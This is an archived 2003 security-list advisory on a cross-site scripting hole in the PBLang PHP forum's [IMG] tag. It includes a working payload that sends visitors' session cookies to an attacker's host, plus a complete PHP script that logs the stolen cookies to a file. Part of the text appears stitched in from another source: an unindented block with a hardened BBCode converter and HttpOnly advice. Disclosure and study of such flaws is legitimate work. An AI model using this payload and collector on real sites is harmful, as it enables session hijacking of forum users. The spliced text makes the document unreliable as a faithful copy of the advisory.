PBLang Cross Site Scripting Vulnerability (Newest version)

From: Quan Van Truong (quan_vu_208cnat_private)
Date: Sat Jul 26 2003 - 18:40:02 PDT

    PBLang is a PHP-based forum. A security hole has just been found in this product
    that allows an attacker to steal cookies or do many other things…
    
    |--------------------------------------------|
    
    Vulnerable systems: PBLang Forum
    Version:   4.56 (4.5 RC 2)
    Website: http://pblang.drmartinus.de/
    Problem: Cross Site Scripting (XSS)
    
    |--------------------------------------------|
    
    When a user inserts [IMG]url[/IMG], PBLang converts that text to
    <img src="url">. If someone inserts javascript:'anyscript'() instead of the
    URL, the JavaScript code is executed by Internet Explorer and some other
    web browsers.
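The forum-side fix is to allow-list the URL scheme before emitting the tag. Escaping the attribute alone does not help here, because a payload such as `javascript:alert(1)` contains no character that htmlspecialchars() would touch; only a check that the value is an absolute http(s) URL rejects it. The converter below is an added example written for this post, not PBLang's own code; the function name safe_img_bbcode and the constructed sample posts are assumptions.

```php
<?php
// Added example (not PBLang's code): a hardened [IMG]url[/IMG] converter.
// Assumption: the forum runs post text through this before it is output.
function safe_img_bbcode(string $text): string
{
    return preg_replace_callback(
        '/\[IMG\](.*?)\[\/IMG\]/is',
        function (array $m): string {
            $url = trim($m[1]);
            // Allow-list: only absolute http(s) URLs with no quotes, angle
            // brackets or whitespace. This rejects javascript:, data:,
            // vbscript: and attribute break-out attempts in one check.
            if (!preg_match('#^https?://[^\s"\'<>]+$#i', $url)) {
                // Not a usable image URL: show the original text, escaped,
                // instead of producing an <img> tag at all.
                return htmlspecialchars($m[0], ENT_QUOTES, 'UTF-8');
            }
            // Escape for the attribute context so quotes cannot break out.
            return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
        },
        $text
    );
}

// Constructed sample posts (not from the advisory).
$posts = [
    '[IMG]http://example.com/pic.png[/IMG]',
    '[IMG]javascript:alert(1)[/IMG]',
    '[IMG]http://example.com/a.png" onerror="alert(1)[/IMG]',
];
foreach ($posts as $p) {
    echo safe_img_bbcode($p), "\n";
}
?>
```

Only the first sample becomes an <img> tag; the other two are printed back as escaped text. Independently of the output fix, marking the session cookie HttpOnly (supported by Internet Explorer since 6.0 SP1) keeps document.cookie from exposing it to script, which limits the cookie-theft impact the post describes even if another injection point is found.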
    
    EXPLOIT:
    
    Inserting a new topic (or reply) with the following text will send
    visitors' cookies to your host. The output is saved to http://your-
    host/cookies.txt .
    
    
    [IMG]javascript:window.open("http://localhost/docs.php?docs="+escape
    (document.cookie), "subwindows", "height=100,width=486")[/IMG]
     
    
    * Code of docs.php file:
    *----------docs.php---------
    <?php
    define("LINE", "\r\n");
    define("HTML_LINE", "<br>");

    function getvars($arr, $title)
    {
        $res = "";
        $len = count($arr);
        if ($len > 0)
        {
            if (strlen($title) > 0)
            {
                print("[--------$title--------]" . HTML_LINE);
                $res .= "[--------$title--------]" . LINE;
            }
            foreach ($arr as $key => $value)
            {
                print("[$key]" . HTML_LINE);
                print($arr[$key] . HTML_LINE);
                $res .= "[$key]" . LINE . $arr[$key] . LINE;
            }
        }
        return $res;
    }

    // get current date
    $now = date("Y-m-d H:i:s");
    // init
    $myData = "[-----$now-----]" . LINE;
    // get
    $myData .= getvars($HTTP_GET_VARS, "");
    // file
    $file = $REMOTE_ADDR . "cookies.txt";
    $mode = "r+";
    if (!file_exists($file))
        $mode = "w+";
    $fp = fopen($file, $mode);
    fseek($fp, 0, SEEK_END);
    fwrite($fp, $myData);
    fclose($fp);
    ?>
    
    ----------docs.php---------*
    
    This archive was generated by hypermail 2b30 : Mon Jul 28 2003 - 15:22:42 PDT